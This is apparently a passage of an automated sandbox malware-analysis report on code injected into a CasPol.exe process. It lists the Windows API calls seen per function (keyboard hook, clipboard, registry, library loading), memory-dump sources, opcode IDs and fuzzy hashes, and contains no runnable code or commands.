Instruction Fuzzy Hash: 584191796403A49FEB088FA4D4D4BBA7BB5FB8C750F108069EA458B3E5C7790942CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1D6CA144 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1D6CB4D9

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b81d2b77d5a102464938789bb92eb505c6b75ddb1d9ded6b309972adc0d7f4b8
Instruction ID: fb2579f3b3941ed013f4d2fa5b32d451c748145fda1707e4fa48cb79e313dea8
Opcode Fuzzy Hash: b81d2b77d5a102464938789bb92eb505c6b75ddb1d9ded6b309972adc0d7f4b8
Instruction Fuzzy Hash: 914136B4A04209CFCB00CF99C488AAABBF5FF8D314F24C459D519AB321C775A841CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 010B0A58 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010B0AF9

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e434bc4533d40bfdfb5cd37179cf92b81cfd1076284cbd3fd8cb01cfb26f5f3b
Instruction ID: 5678f9a199a1ef6f5c5073e3bad1f098fa000d0258e99b441157305d6de5b83b
Opcode Fuzzy Hash: e434bc4533d40bfdfb5cd37179cf92b81cfd1076284cbd3fd8cb01cfb26f5f3b
Instruction Fuzzy Hash: 0F31E230A05349DFDB05CB38C494BDEBFB2AF49304F1588A9E049AB295DB35A885CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010B06F5 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 010B07B9

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c9cf1771cc88667be6fa185b8cc01ebc3dcf1cc2b2a144bd0247b6511ea29907
Instruction ID: 98aac51a06dd9590c843ad273a45f3e63e94cb28db94479c9dfc3bc127da2fa9
Opcode Fuzzy Hash: c9cf1771cc88667be6fa185b8cc01ebc3dcf1cc2b2a144bd0247b6511ea29907
Instruction Fuzzy Hash: E231CCB1D002589FCB10CFAAC984ADEBBF5BF49304F14806AE898AB214D7749945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010B043C Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 010B04FC

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8a254783bb3a395b34b5c2806bdea74ef54d2d3b9e58f86aed3f7dc304d4a396
Instruction ID: c5c40d0c7cfc8fbec358aacfe91860515bbf1705fb175582fbcff335a62f714d
Opcode Fuzzy Hash: 8a254783bb3a395b34b5c2806bdea74ef54d2d3b9e58f86aed3f7dc304d4a396
Instruction Fuzzy Hash: 0B31E0B0D042499FDB14CFA9C684ACEFFF5BF48308F24816AE449AB245C7759985CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01136625 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0113662F

Memory Dump Source

Source File: 00000004.00000002.89316236451.0000000001110000.00000040.00000400.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 08c6944b0286311898e8be39d5ed539ce6bbf3063fdb2f6513d9ca21d3a2ba53
Instruction ID: 8569d376e7aea36451d7aea09d3fd00004ec51753ce68d24280d109886a29405
Opcode Fuzzy Hash: 08c6944b0286311898e8be39d5ed539ce6bbf3063fdb2f6513d9ca21d3a2ba53
Instruction Fuzzy Hash: 8E31F8701497878FEF755E68CD647E63BA29F26394F888198CCC94F187D3354646CB12

Uniqueness

Uniqueness Score: -1.00%

Function 010B0448 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 010B04FC

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e9812013feb8a70ca574aad13da9d79f9b3691e1a090a008b57ccc1fce2bbb1e
Instruction ID: 5aa039ea47583e155964cb09b5c45357ad6d917bf367415ce4d28a6e86629b24
Opcode Fuzzy Hash: e9812013feb8a70ca574aad13da9d79f9b3691e1a090a008b57ccc1fce2bbb1e
Instruction Fuzzy Hash: AE31E0B0D052499FDB10CFA9C584ACEFFF5BF48304F28816AE448AB345C7759985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010495F4 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 01049688

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 73abbfca6f5496b52c7805481c13ba062029051e009d799514c37d49e92b4c70
Instruction ID: bdacc97aceefe930da35ce6793f403535a2e2d63bcbddc5beccf70de33cf6cbe
Opcode Fuzzy Hash: 73abbfca6f5496b52c7805481c13ba062029051e009d799514c37d49e92b4c70
Instruction Fuzzy Hash: 223103B0D05248DFDB14DF99D984BDEBBF1AF48308F248069E544BB290D7746985CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01049600 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 01049688

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: ee77095572f5f551447d9f06c6cc8dbfa5b09dfe93d1f6765fe5b9d8e08443f1
Instruction ID: 8a6c4accd9938c7c49449f3eb0f4d5f16cd37ad79cfd9d800d11c95dda87ff73
Opcode Fuzzy Hash: ee77095572f5f551447d9f06c6cc8dbfa5b09dfe93d1f6765fe5b9d8e08443f1
Instruction Fuzzy Hash: 803111B0D05208DFDB10CF99D984B8EBBF5AF48308F248069E544BB290C7B4A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01047960 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 010479F2

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e6ab095d406c7f4c424c139ea6dce092ba4ea835cc52b47515399cd6be3bcba5
Instruction ID: d628e603fd81be2db68b00eccb7785af0f00904a39d518368efbf12dcc0b15c8
Opcode Fuzzy Hash: e6ab095d406c7f4c424c139ea6dce092ba4ea835cc52b47515399cd6be3bcba5
Instruction Fuzzy Hash: 782145B59042498FCB00CF99C584ADEFBF0FB49318F148569D459AB311D379A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D6CA54B Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D6CA5D7

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 087db2b5b572fe6c450c137eea25f80faf6eb00cf50da64e6dbe02f4585aa76f
Instruction ID: 8a529e1f0c28e8e59ef655d538ffb7fc712a4b3aeca8d93f88ede47f2dbf50de
Opcode Fuzzy Hash: 087db2b5b572fe6c450c137eea25f80faf6eb00cf50da64e6dbe02f4585aa76f
Instruction Fuzzy Hash: C721E3B5D04208AFDB00CFAAD984ADEFBF4FB48314F14841AE955A7350C374AA54CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010489F0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,010489DF), ref: 01048A7F

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 73b71f2b05ee9c5451435dbcf728403f9c4dc5872fa1aac55f124b72861ae838
Instruction ID: c291e680f84ff72bae3db4b65fe981043af1dd3f40ba8ba860e778bc816631cc
Opcode Fuzzy Hash: 73b71f2b05ee9c5451435dbcf728403f9c4dc5872fa1aac55f124b72861ae838
Instruction Fuzzy Hash: DC1189B19082488FDB10CFA9C4847CEFFF4AF49324F15885AD154A7340C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01047F48 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 01047FCD

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 2ba4af24f50cebab761129d1cd1b7a79c8e33ed233af869cf69cd895bf0dbbfb
Instruction ID: 694220c6f813152d8c9e817d64bda6fea63d27a3650b37f2010b36e0bee77db4
Opcode Fuzzy Hash: 2ba4af24f50cebab761129d1cd1b7a79c8e33ed233af869cf69cd895bf0dbbfb
Instruction Fuzzy Hash: 212134B68003099FDB10CF9AD884ADEFBF5FF88314F14852EE959A7600C374A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E6610 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 1C7E65D6

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 9160520b2c759b1a5436d41b0919be8a309cafebe81feeca129a35df94ac2b1d
Instruction ID: 2a5c74b35ec3a7acddb477b0abf1602a1c14faf487e3736b8ddd72cfcd9b6895
Opcode Fuzzy Hash: 9160520b2c759b1a5436d41b0919be8a309cafebe81feeca129a35df94ac2b1d
Instruction Fuzzy Hash: 6E21067AE043458FDB00CF59D8402CEFBB0EF85324F25859AD549AB656D770A484CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D6CA550 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D6CA5D7

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 48f8174b13e271cf713ad20c1f2b20eb2f41d766139a5f3957e8f0f1e0ac2d9a
Instruction ID: 6e4c2938d20a125035d883e56562ba495a84fcd83bb5f5478b0116cfd621bd69
Opcode Fuzzy Hash: 48f8174b13e271cf713ad20c1f2b20eb2f41d766139a5f3957e8f0f1e0ac2d9a
Instruction Fuzzy Hash: 8B21E2B5D042089FDB00CFAAD984ADEBBF4FF48314F14841AE954A7350C378AA50CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01047A58 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 01047AD1

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: ecdecc53d04d594f516aaf6b2fe0b71d0568ade88a47abaf6d0db96d16fa5fa1
Instruction ID: 8059af8ab38165bef61110e27a2f188e365d40b086b70e42cee273918b8cb76d
Opcode Fuzzy Hash: ecdecc53d04d594f516aaf6b2fe0b71d0568ade88a47abaf6d0db96d16fa5fa1
Instruction Fuzzy Hash: 072118B19142098FDB14CFAAC884BEEFBF5EF88324F14842AD454A7640D778A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E15F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 1C7E1673

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c520c90a54f3783a19eba8b4fa2876444587f7ab40ba757d1c7daaf3e114b909
Instruction ID: 85ae91fb81c32dbeff58f41eed3c4c8e6b733d2ef06868ed1adc691dea896a6d
Opcode Fuzzy Hash: c520c90a54f3783a19eba8b4fa2876444587f7ab40ba757d1c7daaf3e114b909
Instruction Fuzzy Hash: 762104B1D042489FCB10DFA9D844BEEBBF4FF89314F14842AD459A7250DBB4A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01047A60 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 01047AD1

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: ff35dfefca3d2f36554d34837f544c4a1bfb5a6a9e1f74d28a12f7b7a907fa22
Instruction ID: e0f5055cfd9d16aed9860291b98a288ce8aa9059011765d9365a0b8fd4f44731
Opcode Fuzzy Hash: ff35dfefca3d2f36554d34837f544c4a1bfb5a6a9e1f74d28a12f7b7a907fa22
Instruction Fuzzy Hash: 962127B1D042098FDB14CFAAC884BEEFBF5EF88314F14842AD494A7640D778A944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01047F50 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 01047FCD

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 6200bd1eea1a948fc611622ef2cd7d73197fe3477bc4f11101c8e53f54fbc325
Instruction ID: be702bcf5d4963e321dc6af2054396b0fbbbf7d7dcaf1a6f19c49ea97a1d4e60
Opcode Fuzzy Hash: 6200bd1eea1a948fc611622ef2cd7d73197fe3477bc4f11101c8e53f54fbc325
Instruction Fuzzy Hash: 3521EFB69013099FDB10CF9AD884ADEFBF5FF88314F14856EE959A7600C374A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E4E20 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 1C7E65D6

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 7aaf9cd09804b7516d0627364de117f588e1cbc6de6ce311c5cebdf662ee6600
Instruction ID: 7ccd5224b588f28bba1ae56840aee8165387276bdb8ce9c04ff3a96286d3114d
Opcode Fuzzy Hash: 7aaf9cd09804b7516d0627364de117f588e1cbc6de6ce311c5cebdf662ee6600
Instruction Fuzzy Hash: AC21F2B6E016098FCB10CF9AD484ADEFBB4FF89214F10852ED459B7601D7B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E6558 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 1C7E65D6

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: b1d25ab97dd4222acb73d743b6eefffb848cde2dd7ffdd24af7e11ffcbe0f4fe
Instruction ID: 80f8ce32b5dd098492e58e78608d4c971291775fa3d904846d976863f56ced68
Opcode Fuzzy Hash: b1d25ab97dd4222acb73d743b6eefffb848cde2dd7ffdd24af7e11ffcbe0f4fe
Instruction Fuzzy Hash: C02113B6D013098FCB10CF99D484ADEFBB4BF89314F10852ED459A7640C3B5A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7EEFA0 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,1C7EEBC2,00000000,00000000,1E8B60D8,1D8D29F8), ref: 1C7EF010

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 9a7d6996f9b9a2d1caa3a59d0287791f7c215b76c33e49ef80a9eb77a0f7467f
Instruction ID: a0f6e06d2b8e896b6fad9963c1eadbf3078ba7241b41e117330669c4e7562e6d
Opcode Fuzzy Hash: 9a7d6996f9b9a2d1caa3a59d0287791f7c215b76c33e49ef80a9eb77a0f7467f
Instruction Fuzzy Hash: 662117B1C042099FDB10CF99D584BDEBBF4FF49324F10802AE555A7651C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E99D8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1C7E99B9,00000800), ref: 1C7E9A4A

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d7a1f3bf77d5eff6216e52aeb36a01552e7c4121ee17ddb1a9fb3a6711e7390
Instruction ID: 06f0f04d0f79097691690152b67b45c950b4f2a4ffb8f013ad88be19d70da9d9
Opcode Fuzzy Hash: 2d7a1f3bf77d5eff6216e52aeb36a01552e7c4121ee17ddb1a9fb3a6711e7390
Instruction Fuzzy Hash: DE2133B69042498FCB00CFAAC444ADEFBF4BF89314F10842ED459AB210C3B5A541CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010B1D9C Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,010BED02), ref: 010BEDEF

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 5251108acf7179c3ceb01cc909f80e1e4d41cfbc2fce18c41ea4ead5928a977a
Instruction ID: 46f878a1638ccaca312af11f600d60f94f13f33a8c83f5d5958d3198b5b7ebff
Opcode Fuzzy Hash: 5251108acf7179c3ceb01cc909f80e1e4d41cfbc2fce18c41ea4ead5928a977a
Instruction Fuzzy Hash: FF1133B1C046599FCB10DF9AC4447DEFBF4AF48214F05816AD954A7240D3B8A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7EDE48 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,1C7EEBC2,00000000,00000000,1E8B60D8,1D8D29F8), ref: 1C7EF010

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 07231c165cb78f77dda12e6f09095aed283fdfef87271ebdaa0ec2f27c7ef490
Instruction ID: 673bc5779054b86baa80991c9650ecd951f49293bc5eb9db82450cada26f6f26
Opcode Fuzzy Hash: 07231c165cb78f77dda12e6f09095aed283fdfef87271ebdaa0ec2f27c7ef490
Instruction Fuzzy Hash: B91129B1C042099FDB10CF9AD444BDEBBF4EF48310F00842AE558A7641C3B8A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E84FC Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1C7E99B9,00000800), ref: 1C7E9A4A

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 68700b5dd4427f91fbe57c82a5db6a0177c59812fe661cd001f9af83826d8c9c
Instruction ID: 62375da8c5e6dca8c131644c98cdb0d8d66e246faadcb8280057b8896780df62
Opcode Fuzzy Hash: 68700b5dd4427f91fbe57c82a5db6a0177c59812fe661cd001f9af83826d8c9c
Instruction Fuzzy Hash: B51103B6D042588FCB10CF9AD444ADEFBF4FF88314F10842AE559A7200C3B4A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1D6C37C8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1D6C53B6

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1b08a6814dac22fcfb58a7a5266d61b9af135891e7b33a0bcc31cb545e12f766
Instruction ID: 35d72e15200b70e857c9b7c423b891f8007debf073055578c32866b17d8171f8
Opcode Fuzzy Hash: 1b08a6814dac22fcfb58a7a5266d61b9af135891e7b33a0bcc31cb545e12f766
Instruction Fuzzy Hash: A81102B5D047098FCB10DF9AD844B9EFBF4EF89214F14841AD859B7600D3B9A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D6C5349 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1D6C53B6

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 73dcc5306e3f3b4ea6f22f87502f84f587cab3a66ba5ee80963ad8dbc448f2ef
Instruction ID: 15119a5125e37d711133452f851ef1cbd5947bb4cbe14f5bb13c9cde10b6deed
Opcode Fuzzy Hash: 73dcc5306e3f3b4ea6f22f87502f84f587cab3a66ba5ee80963ad8dbc448f2ef
Instruction Fuzzy Hash: BD1132B5C042498FCB10CF9AD844BDEFBF4EF89314F04841AD859A7600D3B4A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 010484DC Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,010489DF), ref: 01048A7F

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 697378525da9ce97556759b340a4b5741c54d29eb142fd09febd7c09c7eb435d
Instruction ID: a04560b0b2434d38cac43637d2070d0b620fd5d80a0439957790c070281c4e1d
Opcode Fuzzy Hash: 697378525da9ce97556759b340a4b5741c54d29eb142fd09febd7c09c7eb435d
Instruction Fuzzy Hash: AD1136B19082488FDB10DF99D4887DEFBF4EF89314F14886AD559A7340D7B4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01046EF0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 01047585

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 76684316a69e7adcd47c201babcdfdf9ce7a1bf34c75fc7c7fcf5cbbd0061dc3
Instruction ID: 68bad3c06cb4d9d9d1f135d91d36cf0ba5ceae14eb66ed6ee911265cb82f276a
Opcode Fuzzy Hash: 76684316a69e7adcd47c201babcdfdf9ce7a1bf34c75fc7c7fcf5cbbd0061dc3
Instruction Fuzzy Hash: 641115B19047488FDB10DFAAD588B9EBBF4EB48314F14845AE558AB600D3B8A944CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 1C7EDE94 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,1C7EED07), ref: 1C7EF6FD

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 339844ee0aff1e1abe9f2915e237bb17a81300c1312e54c48cba0f1f69296461
Instruction ID: 1e6006b017657df8292e817b7cccea3757e8eb4ebf29adfb111a1235f65ac747
Opcode Fuzzy Hash: 339844ee0aff1e1abe9f2915e237bb17a81300c1312e54c48cba0f1f69296461
